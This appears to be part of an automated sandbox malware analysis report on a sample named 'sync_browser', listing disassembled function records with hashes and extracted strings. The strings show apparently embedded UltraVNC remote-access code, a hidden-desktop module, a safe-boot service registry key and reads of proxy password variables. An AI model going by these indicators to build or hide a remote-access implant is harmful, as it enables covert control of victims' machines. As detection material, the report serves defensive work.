                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID: CurrentType$Multiprocessor Checked$Multiprocessor Free$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Uniprocessor Checked$Uniprocessor Free
                                                                                          • API String ID: 3677997916-1370392681
                                                                                          • Opcode ID: 127efd2f4bb2d730ad2ffcadb57483ca5e65c2607e8512af785212c1471c3a0c
                                                                                          • Instruction ID: 1eef49b0bdfa1dbc3571957f9570c4d214f4db50d28fd3886b62419e1a4726ee
                                                                                          • Opcode Fuzzy Hash: 127efd2f4bb2d730ad2ffcadb57483ca5e65c2607e8512af785212c1471c3a0c
                                                                                          • Instruction Fuzzy Hash: AA315472B2864381FB108B21E4447AAB368FB65748F805235FA8D865E9EF3CD14DCB01
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Create$BitmapCompatibleDeleteErrorLastObjectSection
                                                                                          • String ID: vncdesktop.cpp : attempting to enable DIBsection blits$vncdesktop.cpp : enabled fast DIBsection blits OK$vncdesktop.cpp : enabled slow blits OK$vncdesktop.cpp : failed to build DIB section - reverting to slow blits$vncdesktop.cpp : failed to create memory bitmap(%d)
                                                                                          • API String ID: 554953491-3667255696
                                                                                          • Opcode ID: 2412a222e5f925d2ec09e0f324b69aa0f7fbd9fb7eb1a0c9a7fdb40c2cf1af0a
                                                                                          • Instruction ID: 0caab4507f79254080c0f45628c5609f1f8c3319804e72e9fec246a0cb38c20e
                                                                                          • Opcode Fuzzy Hash: 2412a222e5f925d2ec09e0f324b69aa0f7fbd9fb7eb1a0c9a7fdb40c2cf1af0a
                                                                                          • Instruction Fuzzy Hash: E9315A36A28A8695EB00DFA4E4444E9B365FB68B48F880532EE4D87758EF7CE149C750
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateValue_errno_invalid_parameter_noinfo_snprintf
                                                                                          • String ID: ?$Network$SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s$Service$uvnc_service
                                                                                          • API String ID: 913464532-2910635102
                                                                                          • Opcode ID: 1bf795a48dcafc41ba0ceb8bae0d18797e802051582379eab5386516ec84cd5c
                                                                                          • Instruction ID: ac6f13f4ff3a04e872852f93fb421d3c4caca2562afb6bea715f5df3b9585f48
                                                                                          • Opcode Fuzzy Hash: 1bf795a48dcafc41ba0ceb8bae0d18797e802051582379eab5386516ec84cd5c
                                                                                          • Instruction Fuzzy Hash: 77218E72A28A8282EB60DB50F45576AB3A0FB95358F800135F78D83BA8DF7DD15DCB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Time$CloseDesktop$BuffersCountCriticalDeleteFlushHandleInputLeaveOpenSectionSystemTick
                                                                                          • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                                          • API String ID: 744660428-3977938048
                                                                                          • Opcode ID: 22d3f79c29f8bed9973b836a1b5c39f0fdd4d046a5132f2854201d0e710f81bf
                                                                                          • Instruction ID: d0b1e0099436a6761b59351e824c6c0acff53d92ac1ac4636fb9f36db7f2d761
                                                                                          • Opcode Fuzzy Hash: 22d3f79c29f8bed9973b836a1b5c39f0fdd4d046a5132f2854201d0e710f81bf
                                                                                          • Instruction Fuzzy Hash: 56D18223A18AC185FB50CB25C4487FE2BA5EBA5B88F194175EA4C8B7E5DF3DE449C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$DesktopLeave$CloseCountEnterInputOpenRevertSelfTickTimetime
                                                                                          • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                                          • API String ID: 2523754900-3977938048
                                                                                          • Opcode ID: 9227ce4079e5a41e03d7563405cc525baa42e0cbfd58b8351677ff8904443c0f
                                                                                          • Instruction ID: 559caeaf78fcc754f6092f94802ea67a1bf55f1ead91c6228ed5e25dcdbdbdd1
                                                                                          • Opcode Fuzzy Hash: 9227ce4079e5a41e03d7563405cc525baa42e0cbfd58b8351677ff8904443c0f
                                                                                          • Instruction Fuzzy Hash: 40B1D233A18AC185FB50CB25C4597FE6BA5EBA5B84F194131EA4C8B7A5DF3CE849C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Time$CloseDesktop$BuffersCountCriticalDeleteFlushHandleInputLeaveOpenSectionSystemTick
                                                                                          • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                                          • API String ID: 744660428-3977938048
                                                                                          • Opcode ID: 7bf16dcfdd47bc453c302434e59752195ffbaf72f3b0f9fbd8307d08b7ae1e5b
                                                                                          • Instruction ID: 2deae6fc2b38d0e3a6b53bca0f66e6761eda1d92d1515c8c3e41cb70c88c7e87
                                                                                          • Opcode Fuzzy Hash: 7bf16dcfdd47bc453c302434e59752195ffbaf72f3b0f9fbd8307d08b7ae1e5b
                                                                                          • Instruction Fuzzy Hash: F4B1C523A18AC185FB50CB25C4587FE6BA5EBA5B84F194131EA4C8B7E5DF3CE449C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: inet_addr$connectgethostbynamehtonssocket
                                                                                          • String ID: 0123456789.
                                                                                          • API String ID: 478842821-2088042752
                                                                                          • Opcode ID: 263abe01daf5a009ada5feb1aef2725500a51be732e0e04e7777c9ecb3499f38
                                                                                          • Instruction ID: 7379331a97854780c1f41fa11562a136a928119b78286d04d3772e435b9b371c
                                                                                          • Opcode Fuzzy Hash: 263abe01daf5a009ada5feb1aef2725500a51be732e0e04e7777c9ecb3499f38
                                                                                          • Instruction Fuzzy Hash: B4418362B2865185EA219F25D440079B3A4FF58F94F045631FD8D47794EF3CE549C710
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$CursorEnterLeave$Rect
                                                                                          • String ID: ^
                                                                                          • API String ID: 2550375211-1590793086
                                                                                          • Opcode ID: d878f0e7e6db227b12d9c6317699a075fbf28d892376275b9f235674c6b9a16b
                                                                                          • Instruction ID: e441d15a6465f62ce021d9fcb09086a2a43235fce22b8f7e3fd7c113cc833b4d
                                                                                          • Opcode Fuzzy Hash: d878f0e7e6db227b12d9c6317699a075fbf28d892376275b9f235674c6b9a16b
                                                                                          • Instruction Fuzzy Hash: 5A41ED37A186818BE728CF19E5942ADB7A1F798B94F144236EB5D43B54CF3CE468CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          • HideDesktop.cpp : Set SPI value for 0x%04x to 0x%08x, xrefs: 00007FF67E7CA7E7
                                                                                          • HideDesktop.cpp : Failed to get SPI value for 0x%04x (0x%08x), xrefs: 00007FF67E7CA726
                                                                                          • HideDesktop.cpp : Failed to set SPI value for 0x%04x to 0x%08x (0x%08x), xrefs: 00007FF67E7CA7AC
                                                                                          • HideDesktop.cpp : Retrieved SPI value for 0x%04x: 0x%08x, xrefs: 00007FF67E7CA738
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorInfoLastParametersSystem
                                                                                          • String ID: HideDesktop.cpp : Failed to get SPI value for 0x%04x (0x%08x)$HideDesktop.cpp : Failed to set SPI value for 0x%04x to 0x%08x (0x%08x)$HideDesktop.cpp : Retrieved SPI value for 0x%04x: 0x%08x$HideDesktop.cpp : Set SPI value for 0x%04x to 0x%08x
                                                                                          • API String ID: 2777246624-2146332292
                                                                                          • Opcode ID: 6a035a78c7a656c7d74b77a1e238c7683e8273999f34b1d7744062f167e8fc50
                                                                                          • Instruction ID: 0814affb30f4ee2347e3e4da4afea0b81a02e60a3402bf8def453eb74aec3a8a
                                                                                          • Opcode Fuzzy Hash: 6a035a78c7a656c7d74b77a1e238c7683e8273999f34b1d7744062f167e8fc50
                                                                                          • Instruction Fuzzy Hash: A5419637F286828AE724CF54F8405A9B365FB64748F500636FA8E97A68DF3CE559C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorFileInfoLastSizeVersion
                                                                                          • String ID: Fail: Using 32bit winvnc.exe with a 64bit driver? $\StringFileInfo\000004b0\ProductVersion$\StringFileInfo\040904b0\ProductVersion
                                                                                          • API String ID: 752140088-134519983
                                                                                          • Opcode ID: 754b2deb5e9b2189dacc26593cdec6785eb92fb7aaf1290d564a347170cf9d67
                                                                                          • Instruction ID: 4262cc8f796d8d4e5a691bba571a7dda0d9846faed188d8267cbfd36faed0f53
                                                                                          • Opcode Fuzzy Hash: 754b2deb5e9b2189dacc26593cdec6785eb92fb7aaf1290d564a347170cf9d67
                                                                                          • Instruction Fuzzy Hash: 9321D867B2964681EA10DBA6A8401E9E3A0FF95BD5F440031FE4D87758EF7CD58EC700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _wgetenv$_errno_invalid_parameter_noinfo
                                                                                          • String ID: CONNECT_PASSWORD$HTTP_PROXY_PASSWORD$SOCKS5_PASSWD$SOCKS5_PASSWORD
                                                                                          • API String ID: 1184729097-3964388033
                                                                                          • Opcode ID: 75c89c269b5bdbccb324d11e52bf46f8eda89c740f1d11fad698b593103782f0
                                                                                          • Instruction ID: c2b8b1cf504bcf0e2f0dea96a7d8b962486b407192e00f7000f8c9855ac314f1
                                                                                          • Opcode Fuzzy Hash: 75c89c269b5bdbccb324d11e52bf46f8eda89c740f1d11fad698b593103782f0
                                                                                          • Instruction Fuzzy Hash: 0321EA23F3AA4380FD959B64E4512B492A8AF74740F4D4935FA0D863E2FF2CE94DD240
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ChainChangeClipboardCurrentKillThreadTimer
                                                                                          • String ID: vncdesktopsink.cpp : Unsethooks Failed$vncdesktopsink.cpp : Unsethooks OK$vncdesktopsink.cpp : WM_DESTROY$vncdesktopsink.cpp : unset SC hooks OK$vncdesktopsink.cpp : unset W8 hooks OK
                                                                                          • API String ID: 3622578367-539335655
                                                                                          • Opcode ID: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
                                                                                          • Instruction ID: 1e30fdd6bb38423943719718e887930050f4ff41c2c161c69ebddd284ccd8133
                                                                                          • Opcode Fuzzy Hash: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
                                                                                          • Instruction Fuzzy Hash: 06212E57B28982A6F64CDF74D9541F9A3A9FFA4701F444532E62ED21A0DF3CA4A9C600
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
